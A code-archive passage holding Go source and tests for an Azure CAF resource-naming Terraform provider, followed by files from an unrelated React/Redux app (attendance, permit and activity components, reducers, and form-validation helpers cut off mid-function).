resourceMapsKeys := make([]string, 0, len(ResourceDefinitions))
for k := range ResourceDefinitions {
resourceMapsKeys = append(resourceMapsKeys, k)
}
return &schema.Resource{
Schema: map[string]*schema.Schema{
// Base name supplied by the user; may be empty.
"name": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "",
},
// Strings prepended to the name (in order).
"prefixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
// Strings appended to the name (in order).
"suffixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
// Number of random characters appended; 0 disables the random suffix.
"random_length": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
ValidateFunc: validation.IntAtLeast(0),
Default: 0,
},
// Computed name for the single resource_type.
"result": {
Type: schema.TypeString,
Computed: true,
},
// Computed names keyed by each entry of resource_types.
"results": {
Type: schema.TypeMap,
Elem: &schema.Schema{
Type: schema.TypeString,
},
Computed: true,
},
"separator": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "-",
},
// When true, strip characters forbidden by the resource's regex from inputs.
"clean_input": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: true,
},
// When true, "name" is used as-is (no prefixes/suffixes/slug/random).
"passthrough": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: false,
},
"resource_type": {
Type: schema.TypeString,
Optional: true,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
ForceNew: true,
},
"resource_types": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
},
Optional: true,
ForceNew: true,
},
// Seed for the random suffix, so names can be reproduced deterministically.
"random_seed": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
},
},
}
}
// resourceNameStateUpgradeV2 upgrades v2 state to schema version 3 by adding
// the "use_slug" attribute, defaulting it to true so existing names keep
// their CAF slug (the v2 behaviour).
func resourceNameStateUpgradeV2(ctx context.Context, rawState map[string]interface{}, meta interface{}) (map[string]interface{}, error) {
rawState["use_slug"] = true
return rawState, nil
}
// resourceName returns the current (schema version 3) definition of the
// azurecaf_name resource. The computed name is produced at Create time and
// never refreshed (Read is a no-op); v2 state is migrated via
// resourceNameStateUpgradeV2.
func resourceName() *schema.Resource {
// Collect every known resource-type key so resource_type(s) can be validated.
resourceMapsKeys := make([]string, 0, len(ResourceDefinitions))
for k := range ResourceDefinitions {
resourceMapsKeys = append(resourceMapsKeys, k)
}
return &schema.Resource{
Create: resourceNameCreate,
Read: schema.Noop,
Delete: schema.RemoveFromState,
SchemaVersion: 3,
StateUpgraders: []schema.StateUpgrader{
{
Type: resourceNameV2().CoreConfigSchema().ImpliedType(),
Upgrade: resourceNameStateUpgradeV2,
Version: 2,
},
},
Schema: map[string]*schema.Schema{
// Base name supplied by the user; may be empty.
"name": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "",
},
// Strings prepended to the name (in order).
"prefixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
// Strings appended to the name (in order).
"suffixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
// Number of random characters appended; 0 disables the random suffix.
"random_length": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
ValidateFunc: validation.IntAtLeast(0),
Default: 0,
},
// Computed name for the single resource_type.
"result": {
Type: schema.TypeString,
Computed: true,
},
// Computed names keyed by each entry of resource_types.
"results": {
Type: schema.TypeMap,
Elem: &schema.Schema{
Type: schema.TypeString,
},
Computed: true,
},
"separator": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "-",
},
// When true, strip characters forbidden by the resource's regex from inputs.
"clean_input": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: true,
},
// When true, "name" is used as-is (no prefixes/suffixes/slug/random).
"passthrough": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: false,
},
"resource_type": {
Type: schema.TypeString,
Optional: true,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
ForceNew: true,
},
"resource_types": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
},
Optional: true,
ForceNew: true,
},
// Seed for the random suffix, so names can be reproduced deterministically.
"random_seed": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
},
// New in v3: include the CAF slug (short resource prefix) in the name.
"use_slug": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: true,
},
},
}
}
// resourceNameCreate computes the name(s) at create time; the resource is
// immutable afterwards, so Create simply delegates to Read.
func resourceNameCreate(d *schema.ResourceData, meta interface{}) error {
return resourceNameRead(d, meta)
}
// resourceNameRead computes the CAF-compliant name(s) into result/results.
func resourceNameRead(d *schema.ResourceData, meta interface{}) error {
return getNameResult(d, meta)
}
// resourceNameDelete is a no-op. NOTE(review): the schema wires Delete to
// schema.RemoveFromState, so this function appears unused — confirm before
// removing it.
func resourceNameDelete(d *schema.ResourceData, meta interface{}) error {
return nil
}
// cleanSlice strips every character forbidden by the resource definition from
// each entry of names. The slice is modified in place and also returned for
// caller convenience.
func cleanSlice(names []string, resourceDefinition *ResourceStructure) []string {
	for i := range names {
		names[i] = cleanString(names[i], resourceDefinition)
	}
	return names
}
// cleanString removes every character of name matched by the resource
// definition's strip pattern (RegEx). If the pattern fails to compile, the
// input is returned unchanged; the previous implementation discarded the
// Compile error and would have panicked calling ReplaceAllString on a nil
// *Regexp.
func cleanString(name string, resourceDefinition *ResourceStructure) string {
	myRegex, err := regexp.Compile(resourceDefinition.RegEx)
	if err != nil {
		// Definitions are covered by TestCompileRegexValidation, but never
		// panic at runtime on a bad pattern.
		return name
	}
	return myRegex.ReplaceAllString(name, "")
}
// concatenateParameters joins all non-empty strings from the given slices,
// preserving order, using separator between them. Empty strings are skipped
// so they never produce doubled separators.
func concatenateParameters(separator string, parameters ...[]string) string {
	elems := []string{}
	for _, items := range parameters {
		for _, item := range items {
			if len(item) > 0 {
				// Append the item directly; the previous
				// append(elems, []string{item}...) allocated a throwaway slice.
				elems = append(elems, item)
			}
		}
	}
	return strings.Join(elems, separator)
}
// getResource resolves resourceType — either a full Terraform resource type
// name or an alias key listed in ResourceMaps — to its ResourceStructure
// definition. Returns an error for unknown types.
func getResource(resourceType string) (*ResourceStructure, error) {
// Translate aliases (ResourceMaps) to their canonical definition key first.
if resourceKey, existing := ResourceMaps[resourceType]; existing {
resourceType = resourceKey
}
if resource, resourceFound := ResourceDefinitions[resourceType]; resourceFound {
return &resource, nil
}
return nil, fmt.Errorf("invalid resource type %s", resourceType)
}
// getSlug returns the CAF short prefix (slug) for resourceType when the
// naming convention uses one (cafclassic or cafrandom); for any other
// convention or an unknown resource type it returns "".
func getSlug(resourceType string, convention string) string {
	if convention != ConventionCafClassic && convention != ConventionCafRandom {
		return ""
	}
	val, ok := ResourceDefinitions[resourceType]
	if !ok {
		return ""
	}
	return val.CafPrefix
}
// trimResourceName truncates resourceName to at most maxLength bytes.
// Names shorter than maxLength are returned unchanged.
func trimResourceName(resourceName string, maxLength int) string {
	if len(resourceName) <= maxLength {
		return resourceName
	}
	return resourceName[:maxLength]
}
func convertInterfaceToString(source []interface{}) []string {
s := make([]string, len(source))
for i, v := range source {
s[i] = fmt.Sprint(v)
}
return s
}
// composeName assembles the final resource name from its parts without ever
// exceeding maxlength (lengths counted in bytes, separators included).
// namePrecedence decides the order in which parts are granted space; prefixes
// are prepended (last prefix first) and suffixes appended (first suffix
// first). A part that no longer fits is silently dropped.
func composeName(separator string,
prefixes []string,
name string,
slug string,
suffixes []string,
randomSuffix string,
maxlength int,
namePrecedence []string) string {
contents := []string{}
currentlength := 0
for i := 0; i < len(namePrecedence); i++ {
// Bytes the separator will cost if a part is added to a non-empty name.
initialized := 0
if len(contents) > 0 {
initialized = len(separator)
}
switch c := namePrecedence[i]; c {
case "name":
if len(name) > 0 {
if currentlength+len(name)+initialized <= maxlength {
contents = append(contents, name)
currentlength = currentlength + len(name) + initialized
}
}
case "slug":
if len(slug) > 0 {
if currentlength+len(slug)+initialized <= maxlength {
// The slug always goes to the very front of the name.
contents = append([]string{slug}, contents...)
currentlength = currentlength + len(slug) + initialized
}
}
case "random":
if len(randomSuffix) > 0 {
if currentlength+len(randomSuffix)+initialized <= maxlength {
contents = append(contents, randomSuffix)
currentlength = currentlength + len(randomSuffix) + initialized
}
}
case "suffixes":
if len(suffixes) > 0 {
if len(suffixes[0]) > 0 {
if currentlength+len(suffixes[0])+initialized <= maxlength {
contents = append(contents, suffixes[0])
currentlength = currentlength + len(suffixes[0]) + initialized
}
}
// Consume one suffix per pass; decrementing i re-runs this case until
// every suffix has been considered.
suffixes = suffixes[1:]
if len(suffixes) > 0 {
i--
}
}
case "prefixes":
if len(prefixes) > 0 {
if len(prefixes[len(prefixes)-1]) > 0 {
if currentlength+len(prefixes[len(prefixes)-1])+initialized <= maxlength {
// Prefixes are prepended from the last to the first, so the final
// order matches the order the user supplied.
contents = append([]string{prefixes[len(prefixes)-1]}, contents...)
currentlength = currentlength + len(prefixes[len(prefixes)-1]) + initialized
}
}
// Consume one prefix per pass; decrementing i re-runs this case until
// every prefix has been considered.
prefixes = prefixes[:len(prefixes)-1]
if len(prefixes) > 0 {
i--
}
}
}
}
content := strings.Join(contents, separator)
return content
}
// validateResourceType checks that at least one resource type was supplied
// and that every supplied type (resource_type plus each resource_types entry)
// is known. On failure it returns (false, error) listing every unknown type,
// one per line.
func validateResourceType(resourceType string, resourceTypes []string) (bool, error) {
	if len(resourceType) == 0 && len(resourceTypes) == 0 {
		return false, fmt.Errorf("resource_type and resource_types parameters are empty, you must specify at least one resource type")
	}
	// Build a fresh slice instead of appending to resourceTypes: append could
	// otherwise write into the caller's backing array if it had spare capacity.
	resourceList := make([]string, 0, len(resourceTypes)+1)
	resourceList = append(resourceList, resourceTypes...)
	if len(resourceType) > 0 {
		resourceList = append(resourceList, resourceType)
	}
	errorStrings := []string{}
	for _, resource := range resourceList {
		if _, err := getResource(resource); err != nil {
			errorStrings = append(errorStrings, err.Error())
		}
	}
	if len(errorStrings) > 0 {
		// Use "%s" so the joined error text is never treated as a format
		// string (flagged by go vet's printf check).
		return false, fmt.Errorf("%s", strings.Join(errorStrings, "\n"))
	}
	return true, nil
}
// getResourceName builds and validates the CAF name for a single resource
// type. It optionally cleans each input against the resource's strip regex,
// optionally prepends the CAF slug, composes the parts within the resource's
// MaxLength, lowercases when required, and finally checks the result against
// the resource's validation regex. Returns an error for unknown types, bad
// patterns, or a composed name that fails validation.
func getResourceName(resourceTypeName string, separator string,
prefixes []string,
name string,
suffixes []string,
randomSuffix string,
convention string,
cleanInput bool,
passthrough bool,
useSlug bool,
namePrecedence []string) (string, error) {
resource, err := getResource(resourceTypeName)
if err != nil {
return "", err
}
validationRegEx, err := regexp.Compile(resource.ValidationRegExp)
if err != nil {
return "", err
}
slug := ""
if useSlug {
slug = getSlug(resourceTypeName, convention)
}
if cleanInput {
// Strip characters the target resource type does not allow.
prefixes = cleanSlice(prefixes, resource)
suffixes = cleanSlice(suffixes, resource)
name = cleanString(name, resource)
separator = cleanString(separator, resource)
randomSuffix = cleanString(randomSuffix, resource)
}
var resourceName string
if passthrough {
// Passthrough: use the (possibly cleaned) name verbatim.
resourceName = name
} else {
resourceName = composeName(separator, prefixes, name, slug, suffixes, randomSuffix, resource.MaxLength, namePrecedence)
}
resourceName = trimResourceName(resourceName, resource.MaxLength)
if resource.LowerCase {
resourceName = strings.ToLower(resourceName)
}
if !validationRegEx.MatchString(resourceName) {
return "", fmt.Errorf("invalid name for CAF naming %s %s, the pattern %s doesn't match %s", resource.ResourceTypeName, name, resource.ValidationRegExp, resourceName)
}
return resourceName, nil
}
// getNameResult reads the resource arguments, generates the name for
// resource_type into "result" and a name per resource_types entry into
// "results", and assigns a fresh random ID. The same random suffix (seeded by
// random_seed) is reused across every generated name.
// NOTE(review): errors from d.Set are ignored here — confirm that is
// acceptable for this provider.
func getNameResult(d *schema.ResourceData, meta interface{}) error {
name := d.Get("name").(string)
prefixes := convertInterfaceToString(d.Get("prefixes").([]interface{}))
suffixes := convertInterfaceToString(d.Get("suffixes").([]interface{}))
separator := d.Get("separator").(string)
resourceType := d.Get("resource_type").(string)
resourceTypes := convertInterfaceToString(d.Get("resource_types").([]interface{}))
cleanInput := d.Get("clean_input").(bool)
passthrough := d.Get("passthrough").(bool)
useSlug := d.Get("use_slug").(bool)
randomLength := d.Get("random_length").(int)
randomSeed := int64(d.Get("random_seed").(int))
// Only the CAF classic convention is supported by this resource.
convention := ConventionCafClassic
randomSuffix := randSeq(int(randomLength), &randomSeed)
// Order in which composeName grants space to each part.
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
isValid, err := validateResourceType(resourceType, resourceTypes)
if !isValid {
return err
}
if len(resourceType) > 0 {
resourceName, err := getResourceName(resourceType, separator, prefixes, name, suffixes, randomSuffix, convention, cleanInput, passthrough, useSlug, namePrecedence)
if err != nil {
return err
}
d.Set("result", resourceName)
}
resourceNames := make(map[string]string, len(resourceTypes))
for _, resourceTypeName := range resourceTypes {
var err error
resourceNames[resourceTypeName], err = getResourceName(resourceTypeName, separator, prefixes, name, suffixes, randomSuffix, convention, cleanInput, passthrough, useSlug, namePrecedence)
if err != nil {
return err
}
}
d.Set("results", resourceNames)
// Resource identity is a fresh random string, independent of random_seed.
d.SetId(randSeq(16, nil))
return nil
}
<file_sep>/azurecaf/models_generated_test.go
package azurecaf
import (
"regexp"
"strings"
"testing"
)
// TestCompileRegexValidation verifies that both regex patterns of every
// resource definition (ValidationRegExp and the strip RegEx) compile.
func TestCompileRegexValidation(t *testing.T) {
for _, resource := range ResourceDefinitions {
_, err := regexp.Compile(resource.ValidationRegExp)
if err != nil {
t.Logf("Error on the validation regex %s for the resource %s error %v", resource.ValidationRegExp, resource.ResourceTypeName, err.Error())
t.Fail()
}
_, err = regexp.Compile(resource.RegEx)
if err != nil {
t.Logf("Error on the regex %s for the resource %s error %v", resource.RegEx, resource.ResourceTypeName, err.Error())
t.Fail()
}
}
}
// TestStrimingNameRegexValidation ensures the strip regex (RegEx) of every
// resource definition leaves plain lowercase alphanumeric content untouched.
func TestStrimingNameRegexValidation(t *testing.T) {
	for _, resource := range ResourceDefinitions {
		reg, err := regexp.Compile(resource.RegEx)
		if err != nil {
			t.Logf("Error on the regex %s for the resource %s error %v", resource.RegEx, resource.ResourceTypeName, err.Error())
			t.Fail()
			// Fix: skip this definition — reg is nil after a failed Compile
			// and the call below would panic.
			continue
		}
		content := "abcde"
		result := reg.ReplaceAllString(content, "")
		if len(result) != 5 {
			// Clearer diagnostic than the previous garbled message.
			t.Logf("%s : expected the strip regex not to remove anything from %q, got %q", resource.ResourceTypeName, content, result)
			t.Fail()
		}
	}
}
// TestRegexValidationMinLength checks that a string of exactly MinLength
// characters passes every resource's validation regex.
func TestRegexValidationMinLength(t *testing.T) {
	content := "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
	contentBase := []rune(content)
	for _, resource := range ResourceDefinitions {
		exp, err := regexp.Compile(resource.ValidationRegExp)
		if err != nil {
			t.Logf("Error on the regex %s for the resource %s error %v", resource.ValidationRegExp, resource.ResourceTypeName, err.Error())
			t.Fail()
			// Fix: skip this definition — exp is nil after a failed Compile
			// and MatchString below would panic.
			continue
		}
		min := resource.MinLength
		// Added here because there is a bug on the golang regex
		if min == 1 {
			min = 2
		}
		test := string(contentBase[0:min])
		if !exp.MatchString(test) {
			t.Logf("Error on the regex %s for the resource %s min length %v", resource.ValidationRegExp, resource.ResourceTypeName, resource.MinLength)
			t.Fail()
		}
	}
}
// TestRegexValidationMaxLength checks that a string of exactly MaxLength
// characters passes each resource's validation regex, while MaxLength+1
// characters fail it.
func TestRegexValidationMaxLength(t *testing.T) {
	// Build a 2010-character buffer of 'a's; assumes every MaxLength is below
	// that — TODO confirm against the definitions.
	content := "aaaaaaaaaa"
	for i := 0; i < 200; i++ {
		content = strings.Join([]string{content, "aaaaaaaaaa"}, "")
	}
	contentBase := []rune(content)
	for _, resource := range ResourceDefinitions {
		exp, err := regexp.Compile(resource.ValidationRegExp)
		if err != nil {
			t.Logf("Error on the regex %s for the resource %s error %v", resource.ValidationRegExp, resource.ResourceTypeName, err.Error())
			t.Fail()
			// Fix: skip this definition — exp is nil after a failed Compile
			// and MatchString below would panic.
			continue
		}
		max := resource.MaxLength
		test := string(contentBase[0:max])
		if !exp.MatchString(test) {
			t.Logf("Error on the regex %s for the resource %s at max length %v", resource.ValidationRegExp, resource.ResourceTypeName, resource.MaxLength)
			t.Fail()
		}
		testGreater := string(contentBase[0 : max+1])
		if exp.MatchString(testGreater) {
			t.Logf("Error on the regex %s for the resource %s greater than max length %v", resource.ValidationRegExp, resource.ResourceTypeName, resource.MaxLength)
			t.Fail()
		}
	}
}
// TestRegexValidationDashes checks that each resource's validation regex
// accepts a dashed name exactly when the definition's Dashes flag is set.
func TestRegexValidationDashes(t *testing.T) {
	content := "aaa-aaa"
	for _, resource := range ResourceDefinitions {
		exp, err := regexp.Compile(resource.ValidationRegExp)
		if err != nil {
			t.Logf("Error on the regex %s for the resource %s error %v", resource.ValidationRegExp, resource.ResourceTypeName, err.Error())
			t.Fail()
			// Fix: skip this definition — exp is nil after a failed Compile
			// and MatchString below would panic.
			continue
		}
		dashes := resource.Dashes
		// Mismatch when the match result disagrees with the Dashes flag.
		if exp.MatchString(content) == !dashes {
			t.Logf("Error on the regex %s for the resource %s using dashes", resource.ValidationRegExp, resource.ResourceTypeName)
			t.Fail()
		}
	}
}
| 113179ca47356243ff1c716072a9a918853803e0 | [
"Markdown",
"Go",
"Makefile"
] | 25 | Go | aztfmod/terraform-provider-azurecaf | e3a8ca154e4b6ea107dd06d8096be52d0454b1e0 | 0aea2c47bc9333fc27ae944841ac373c456015b9 |
refs/heads/master | <repo_name>inv-Karan/argo_ll_react<file_sep>/src/ActionCreators/activityAction.js
import {activityConstants} from '../Constants/activityConstant'
import {showActivity, addActivity, deleteActivity, updateActivity} from '../Utility/API/activityServices'
// Plain action creators for the activity slice: each wraps the server
// payload in a typed Redux action.
const activityShow = (activities) => ({
  type: activityConstants.ACTIVITY_SHOW,
  payload: activities,
});

const activityUpdate = (activities) => ({
  type: activityConstants.ACTIVITY_UPDATE,
  payload: activities,
});

const activityAdd = (activities) => ({
  type: activityConstants.ACTIVITY_NEW,
  payload: activities,
});

const activityDelete = (activities) => ({
  type: activityConstants.ACTIVITY_DELETE,
  payload: activities,
});
// Thunk: fetch every activity for userId and publish the list to the store.
function getActivity(userId) {
  return (dispatch) => {
    showActivity(userId)
      .then((res) => {
        dispatch(activityShow(res.data.activities));
      })
      .catch((err) => {
        // Fix: errors were swallowed silently; at least surface them.
        console.error('getActivity failed', err);
      });
  };
}

// Thunk: persist changes to activity `id` and publish the updated list.
// Fix: removed leftover `debugger` statements.
function editActivity(id, data) {
  return (dispatch) => {
    updateActivity(id, data)
      .then((res) => {
        dispatch(activityUpdate(res.data.activities));
      })
      .catch((err) => {
        console.error('editActivity failed', err);
      });
  };
}

// Thunk: create a new activity from obj and publish the updated list.
function newActivity(obj) {
  return (dispatch) => {
    addActivity(obj)
      .then((res) => {
        dispatch(activityAdd(res.data.activities));
      })
      .catch((err) => {
        console.error('newActivity failed', err);
      });
  };
}

// Thunk: delete the activity described by obj and publish the updated list.
function removeActivity(obj) {
  return (dispatch) => {
    deleteActivity(obj)
      .then((res) => {
        dispatch(activityDelete(res.data.activities));
      })
      .catch((err) => {
        console.error('removeActivity failed', err);
      });
  };
}
export {getActivity, editActivity, newActivity, removeActivity}<file_sep>/src/Reducers/indexReducers.js
import {combineReducers} from 'redux';
import {authentication} from './signinReducers';
import {registration} from './signupReducers';
import {alert} from './alertReducers';
import {userReducers} from './userReducers';
import {attendanceReducers} from './attendanceReducer';
import {queryReducers} from './queryReducer';
import {permitReducers} from './permitReducer';
import {newsReducers} from './newsReducer';
import {notificationReducers} from './notificationReducer';
import {activityReducers} from './activityReducer'
// Root reducer: one slice per feature, keyed by the names the containers use
// in mapStateToProps (e.g. state.attendanceReducers.details).
const rootReducer = combineReducers({
authentication,
registration,
alert,
userReducers,
attendanceReducers,
queryReducers,
permitReducers,
newsReducers,
notificationReducers,
activityReducers
});
export default rootReducer;<file_sep>/src/container/Attendance/index.js
import React, { Component } from "react";
import { connect } from 'react-redux';
import { getAttendance, editAttendance, newAttendance, removeAttendance } from '../../ActionCreators/attendenceAction'
class Attendance extends Component {
constructor(props) {
super(props);
this.state = {
"user_id": 1,
"location": "dfgd",
"lat": "123",
"lng": "3242",
"time": "09:14:36",
"date": "2020-07-16",
"type": "clock_in",
"weather": "111"
};
};
getLocation = () => {
if (navigator.geolocation) {
navigator.geolocation.watchPosition(this.showPosition);
} else {
console.log('error in Location')
};
};
showPosition = (position) => {
this.setState({
lat: position.coords.latitude,
long: position.coords.longitude
})
};
componentDidMount() {
this.getLocation()
this.props.getAttendance(1)
};
handleShowAttendance = () => {
// const obj = this.state;
debugger
this.props.getAttendance(1)
};
handleUpdateAttendance = () => {
const obj = this.state;
// obj.weather = Date.now().toString()
debugger
this.props.editAttendance(12, obj)
};
handleNewAttendance = () => {
const obj = this.state;
debugger
this.props.newAttendance(obj)
};
handleDeleteAttendance = () => {
const obj = this.state;
debugger
this.props.removeAttendance(obj)
};
render() {
console.log(this.props.details)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowAttendance()
}}>Display attendance</button>
<button onClick={() => {
this.handleUpdateAttendance()
}}>Update attendance</button>
<button onClick={() => {
this.handleNewAttendance()
}}>New attendance</button>
<button onClick={() => {
this.handleDeleteAttendance()
}}>Delete attendance</button>
</div>
);
};
};
// Expose the attendance list slice as the `details` prop.
const mapStateToProps = (state) => {
return {
details: state.attendanceReducers.details
};
};
// Thunks bound to dispatch and injected as props of the same name.
const mapDispatchToProps = {
getAttendance,
editAttendance,
newAttendance,
removeAttendance
};
export default connect(mapStateToProps, mapDispatchToProps)(Attendance);
// Redux action types for the attendance slice.
export const attendanceConstants = {
ATTENDANCE_SHOW: 'ATTENDANCE_SHOW',
ATTENDANCE_NEW: 'ATTENDANCE_NEW',
ATTENDANCE_DELETE: 'ATTENDANCE_DELETE',
ATTENDANCE_UPDATE: 'ATTENDANCE_UPDATE'
};
// Redux action types for the news slice.
export const newsConstants = {
NEWS_SHOW: 'NEWS_SHOW',
NEWS_NEW: 'NEWS_NEW',
NEWS_DELETE: 'NEWS_DELETE',
NEWS_UPDATE: 'NEWS_UPDATE'
};
// Redux action types for the activity slice.
export const activityConstants = {
ACTIVITY_SHOW: 'ACTIVITY_SHOW',
ACTIVITY_NEW: 'ACTIVITY_NEW',
ACTIVITY_DELETE: 'ACTIVITY_DELETE',
ACTIVITY_UPDATE: 'ACTIVITY_UPDATE'
};
import React, { Component } from "react";
import { connect } from 'react-redux';
import { getPermit, editPermit, newPermit, removePermit } from '../../ActionCreators/permitAction'
class Permit extends Component {
constructor(props) {
super(props);
this.state = {
"user_id": "2",
"photopath": "1596539562Screenshot 2020-07-31 at 8.49.38 PM.png",
"isApproved": "1",
"name": "first"
};
};
componentDidMount() {
this.props.getPermit(1)
};
handleShowPermit = () => {
// const obj = this.state;
debugger
this.props.getPermit(1)
};
handleUpdatePermit = () => {
const obj = this.state;
debugger
this.props.editPermit(1, obj)
};
handleNewPermit = () => {
const obj = this.state;
debugger
this.props.newPermit(obj)
};
handleDeletePermit = () => {
const obj = this.state;
debugger
this.props.removePermit(obj)
};
render() {
console.log(this.props.permit)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowPermit()
}}>Display permit</button>
<button onClick={() => {
this.handleUpdatePermit()
}}>Update permit</button>
<button onClick={() => {
this.handleNewPermit()
}}>New permit</button>
<button onClick={() => {
this.handleDeletePermit()
}}>Delete permit</button>
</div>
);
};
};
// Expose the permit slice as the `permit` prop.
const mapStateToProps = (state) => {
return {
permit: state.permitReducers.permit
};
};
// Thunks bound to dispatch and injected as props of the same name.
const mapDispatchToProps = {
getPermit,
editPermit,
newPermit,
removePermit
};
export default connect(mapStateToProps, mapDispatchToProps)(Permit);
<file_sep>/src/container/Activity/index.js
import React, { Component } from "react";
import { connect } from 'react-redux';
import { getActivity, editActivity, newActivity, removeActivity } from '../../ActionCreators/activityAction'
class Activity extends Component {
constructor(props) {
super(props);
this.state = {
"title": "demo",
"descr": "descr",
"date": "0000-00-00",
"time": "00:00:00",
"activity_by": "1",
"activity_to": "1",
"isComplete": "0",
"isReassigned": "0",
"weather": "1",
"remark": "none",
"elevation": "1",
"lat": "1",
"longtitute": "1",
"image": "Screenshot 2020-07-31 at 8.49.38 PM.png"
};
};
componentDidMount() {
this.props.getActivity(1)
};
handleShowActivity = () => {
// const obj = this.state;
debugger
this.props.getActivity(1)
};
handleUpdateActivity = () => {
const obj = this.state;
debugger
this.props.editActivity(1, obj)
};
handleNewActivity = () => {
const obj = this.state;
debugger
this.props.newActivity(obj)
};
handleDeleteActivity = () => {
const obj = this.state;
debugger
this.props.removeActivity(obj)
};
render() {
console.log(this.props.activity)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowActivity()
}}>Display activity</button>
<button onClick={() => {
this.handleUpdateActivity()
}}>Update activity</button>
<button onClick={() => {
this.handleNewActivity()
}}>New activity</button>
<button onClick={() => {
this.handleDeleteActivity()
}}>Delete activity</button>
</div>
);
};
};
// Expose the activity slice as the `activity` prop.
const mapStateToProps = (state) => {
return {
activity: state.activityReducers.activity
};
};
// Thunks bound to dispatch and injected as props of the same name.
const mapDispatchToProps = {
getActivity,
editActivity,
newActivity,
removeActivity
};
export default connect(mapStateToProps, mapDispatchToProps)(Activity);
<file_sep>/src/container/validation.js
import React from 'react';
import SignUp from '../container/Login/signup';
import SignIn from '../container/Login/signin';
// Validates a person name: required, letters/spaces/hyphens only, at least
// three characters. Returns an error message string, or null when valid.
const nameValidation = (fieldName, fieldValue) => {
  const trimmed = fieldValue.trim();
  if (trimmed === '') {
    return `${fieldName} is required`;
  }
  if (/[^a-zA-Z -]/.test(fieldValue)) {
    return 'Invalid characters';
  }
  if (trimmed.length < 3) {
    return `${fieldName} needs to be at least three characters`;
  }
  return null;
};
// Validates an email address. Returns null when valid, 'Email is required'
// when blank, otherwise a generic invalid-email message.
const emailValidation = (Email) => {
  const pattern = /^[a-zA-Z0-9.!#$%&’*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$/;
  if (pattern.test(Email)) {
    return null;
  }
  return Email.trim() === '' ? 'Email is required' : 'Please enter a valid email';
};
// Validates a 10-digit mobile number. Returns an error message string, or
// null when valid.
const mobileValidation = (fieldNumber, fieldValue) => {
  if (fieldValue.trim() === '') {
    return `${fieldNumber} is required`;
  }
  if (/[^0-9]/.test(fieldValue)) {
    return 'Invalid characters';
  }
  // Fix: the previous check used `== 10`, i.e. it rejected exactly the valid
  // length and accepted every other one.
  if (fieldValue.trim().length !== 10) {
    return `${fieldNumber} must be ten digits`;
  }
  return null;
};
// Validates the alternate 10-digit mobile number. Returns an error message
// string, or null when valid.
const altmobileValidation = (fieldNumber, fieldValue) => {
  if (fieldValue.trim() === '') {
    return `${fieldNumber} is required`;
  }
  if (/[^0-9]/.test(fieldValue)) {
    return 'Invalid characters';
  }
  // Fix: the previous check used `== 10`, rejecting exactly the valid length.
  if (fieldValue.trim().length !== 10) {
    return `${fieldNumber} must be ten digits`;
  }
  return null;
};
// Validates a password: required, only the allowed character set, and at
// least six characters. Returns an error message string, or null when valid.
const passwordValidation = (fieldPassword, fieldValue) => {
  if (fieldValue.trim() === '') {
    return `${fieldPassword} is required`;
  }
  // Fix: the character class was not negated, so any password containing an
  // allowed character was flagged as invalid.
  if (/[^a-zA-Z0-9.!#$%&’*]/.test(fieldValue)) {
    return 'Invalid characters';
  }
  // Fix: the previous `length >= 6` rejected every sufficiently long
  // password (and the message said "ten digits"); enforce a minimum instead.
  if (fieldValue.trim().length < 6) {
    return `${fieldPassword} must be at least six characters`;
  }
  return null;
};
// Validates an address: required, restricted character set, and at least six
// characters. Returns an error message string, or null when valid.
const addressValidation = (fieldAddress, fieldValue) => {
  if (fieldValue.trim() === '') {
    return `${fieldAddress} is required`;
  }
  // Fix: negate the character class (the previous regex matched allowed
  // characters, so every normal address was rejected). Spaces, commas and
  // dots are additionally allowed — TODO confirm the intended character set.
  if (/[^a-zA-Z0-9/ ,.-]/.test(fieldValue)) {
    return 'Invalid characters';
  }
  // Fix: the previous `length > 6` with a "must be ten digits" message was a
  // copy-paste error; enforce a sensible minimum length instead.
  if (fieldValue.trim().length < 6) {
    return `${fieldAddress} must be at least six characters`;
  }
  return null;
};
// Validates a date of birth string: required, digits plus '/' or '-' only,
// and ten characters (DD-MM-YYYY style). Returns an error message string, or
// null when valid.
const dobValidation = (fieldDOB, fieldValue) => {
  if (fieldValue.trim() === '') {
    return `${fieldDOB} is required`;
  }
  // Fix: negate the class so only digits, '/' and '-' are accepted (the
  // previous regex rejected every value containing a digit).
  if (/[^0-9/-]/.test(fieldValue)) {
    return 'Invalid characters';
  }
